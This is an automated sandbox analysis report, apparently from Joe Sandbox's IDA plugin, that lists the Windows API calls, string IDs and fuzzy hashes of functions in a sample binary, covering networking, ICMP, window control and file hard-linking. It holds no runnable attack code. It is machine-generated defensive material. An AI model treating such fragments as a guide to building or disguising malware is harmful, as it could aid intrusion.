                                                                              • String ID: HH
                                                                              • API String ID: 2507767853-2761332787
                                                                              • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                              • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                              • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ErrorMode$InformationVolume
                                                                              • String ID: HH
                                                                              • API String ID: 2507767853-2761332787
                                                                              • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                              • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                              • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                              • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: msctls_trackbar32
                                                                              • API String ID: 3850602802-1010561917
                                                                              • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                              • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                                              • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                                              APIs
                                                                                • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                              • gethostbyname.WSOCK32(?), ref: 0046BD78
                                                                              • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                                              • inet_ntoa.WSOCK32(00000000), ref: 0046BDCD
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                                              • String ID: HH
                                                                              • API String ID: 1515696956-2761332787
                                                                              • Opcode ID: 536d88bcd2219f00ee4950b39be395ae06382d48515621a82e1548501abb3963
                                                                              • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                                                              • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                                                              APIs
                                                                                • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                              • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                              • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                              • CoUninitialize.OLE32 ref: 0046CE50
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                              • String ID: .lnk
                                                                              • API String ID: 886957087-24824748
                                                                              • Opcode ID: 8095c6d59d69238af541582e7c79e2891b33013a97e816c4c493b562f1f8ea66
                                                                              • Instruction ID: 634f95a1702cd93f148e07eb64efb4b351689d97c5b229aafe37579347e0b37e
                                                                              • Instruction Fuzzy Hash: E821AF312083009FC700EF55C985F5ABBF4EF89724F148A6EF9549B2E2D7B5A805CB56
                                                                              APIs
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • GetMenuItemInfoW.USER32 ref: 004497EA
                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                                                                              • DrawMenuBar.USER32 ref: 00449828
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Menu$InfoItem$Draw_malloc
                                                                              • String ID: 0
                                                                              • API String ID: 772068139-4108050209
                                                                              • Opcode ID: d608b06cc8126a94f8b189079e1e99a50943cf597b9c9b58a32df480197dd29f
                                                                              • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                                                              • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AllocTask_wcslen
                                                                              • String ID: hkG
                                                                              • API String ID: 2651040394-3610518997
                                                                              • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                              • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                                                              • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                              • API String ID: 2574300362-1816364905
                                                                              • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                              • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                                              • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,00000000,?,?,00000101,?,?), ref: 004343DE
                                                                              • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: ICMP.DLL$IcmpSendEcho
                                                                              • API String ID: 2574300362-58917771
                                                                              • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                              • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                                                              • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                                              • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                              Strings
                                                                               Memory Dump Source
                                                                               • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: ICMP.DLL$IcmpCloseHandle
                                                                              • API String ID: 2574300362-3530519716
                                                                              • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                              • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                                                              • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                                                                              • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: ICMP.DLL$IcmpCreateFile
                                                                              • API String ID: 2574300362-275556492
                                                                              • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                              • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                                                              • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,0040E551,?), ref: 0040EE7B
                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                              • API String ID: 2574300362-3024904723
                                                                              • Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                              • Instruction ID: 75875fa2f3f8b89ed4c8cde0d061cde3839b728dd3838c322d7dfd2ddbff31fa
                                                                              • Instruction Fuzzy Hash: 51D0C9B0940707DAC7301F72C91871B7AE4AB40342F204C3EB995A1290DBBCC0408B28
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,0040E5BF,?), ref: 0040EEEB
                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040EEFD
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                              • API String ID: 2574300362-192647395
                                                                              • Opcode ID: 58ac1dddc1eea1967b9e3df612208a50857473a21dbb81c427901d39c1ebcba1
                                                                              • Instruction ID: 788ba9bdae5bc0ddad915f4d08bdcf590d5e3b2ea1e3da194f5c7121584c3133
                                                                              • Instruction Fuzzy Hash: ABD0C9B0944703AAC7311F72C91C70A7AE4AB40341F204C3EB996E1691DBBCC0508B2C
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: 3e9ce65d11b316350caf6cb0db2ee4373dc883206541589756c66e9508b68ec6
                                                                              • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                                                                              • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                                                                              APIs
                                                                              • __flush.LIBCMT ref: 00414630
                                                                              • __fileno.LIBCMT ref: 00414650
                                                                              • __locking.LIBCMT ref: 00414657
                                                                              • __flsbuf.LIBCMT ref: 00414682
                                                                                • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                              Similarity
                                                                              • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                              • String ID:
                                                                              • API String ID: 3240763771-0
                                                                              • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                              • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                                                              • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                              • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                              • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                              Similarity
                                                                              • API ID: CopyVariant$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 2286883814-0
                                                                              • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                              • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                                                                              • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                                                                              APIs
                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                                              • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                                              • #21.WSOCK32 ref: 004740E0
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                                              Similarity
                                                                              • API ID: ErrorLast$socket
                                                                              • String ID:
                                                                              • API String ID: 1881357543-0
                                                                              • Opcode ID: 34147ac461a0e284a181aa69957adffe558344c6371ca04fba36d93f3b76d486
                                                                              • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                                                                              • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                                                                              APIs
                                                                              • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                              • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                              • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                              • MessageBeep.USER32(00000000), ref: 00441DF2
                                                                              Similarity
                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 1352109105-0
                                                                              • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                              • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                                                              • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                                                              APIs
                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                                                                              • __isleadbyte_l.LIBCMT ref: 004238B2
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                                                                              Similarity
                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                              • String ID:
                                                                              • API String ID: 3058430110-0
                                                                              • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                              • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                                                                              • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                                                                              APIs
                                                                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                                                                              • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                                              • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 3321077145-0
                                                                              • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                              • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                                                              • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                              • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 004505BF
                                                                              • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                              • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                              • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                              Similarity
                                                                              • API ID: Proc$Parent
                                                                              • String ID:
                                                                              • API String ID: 2351499541-0
                                                                              • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                              • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                                              • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                              • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                                              APIs
                                                                                • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                                                                              • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                                                                              • __itow.LIBCMT ref: 00461461
                                                                              • __itow.LIBCMT ref: 004614AB
                                                                              Similarity
                                                                              • API ID: MessageSend$__itow$_wcslen
                                                                              • String ID:
                                                                              • API String ID: 2875217250-0
                                                                              • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                              • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                                                                              • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                              • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0040E202
                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                              Similarity
                                                                              • API ID: IconNotifyShell__memset
                                                                              • String ID:
                                                                              • API String ID: 928536360-0
                                                                              • Opcode ID: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                              • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                                                                              • Opcode Fuzzy Hash: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                              • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                                                                              APIs
                                                                              • GetForegroundWindow.USER32 ref: 00472806
                                                                                • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                                                • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                                                                                • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                                              • GetCaretPos.USER32(?), ref: 0047281A
                                                                              • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                                              • GetForegroundWindow.USER32 ref: 0047285C
                                                                              Similarity
                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                              • String ID:
                                                                              • API String ID: 2759813231-0
                                                                              • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                              • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                                                                              • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                              • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                                                              APIs
                                                                                • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                                                                              Similarity
                                                                              • API ID: Window$Long$AttributesLayered
                                                                              • String ID:
                                                                              • API String ID: 2169480361-0
                                                                              • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                              • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                              • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                              • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                              APIs
                                                                              • SendMessageW.USER32 ref: 00448CB8
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                              • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                              • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow
                                                                              • String ID:
                                                                              • API String ID: 312131281-0
                                                                              • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                              • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                              • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                              • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                              APIs
                                                                              • select.WSOCK32 ref: 0045890A
                                                                              • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00458927
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                              Similarity
                                                                              • API ID: ErrorLastacceptselect
                                                                              • String ID:
                                                                              • API String ID: 385091864-0
                                                                              • Opcode ID: 4f99be09ea3748399bcd45f1fb284b1e509608db9923cba0f0141099163bafeb
                                                                              • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                              • Opcode Fuzzy Hash: 4f99be09ea3748399bcd45f1fb284b1e509608db9923cba0f0141099163bafeb
                                                                              • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                              • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                              • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                              • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                              APIs
                                                                              • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                                                              • GetStockObject.GDI32(00000011), ref: 00433695
                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                              • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                              Similarity
                                                                              • API ID: Window$CreateMessageObjectSendShowStock
                                                                              • String ID:
                                                                              • API String ID: 1358664141-0
                                                                              • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                              • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                              • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                              • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                              • String ID:
                                                                              • API String ID: 2880819207-0
                                                                              • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                              • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                              • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                              • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 00434037
                                                                              • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                              • ScreenToClient.USER32(?,?), ref: 00434085
                                                                              • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                              • String ID:
                                                                              • API String ID: 357397906-0
                                                                              • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                              • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                              • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                              • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
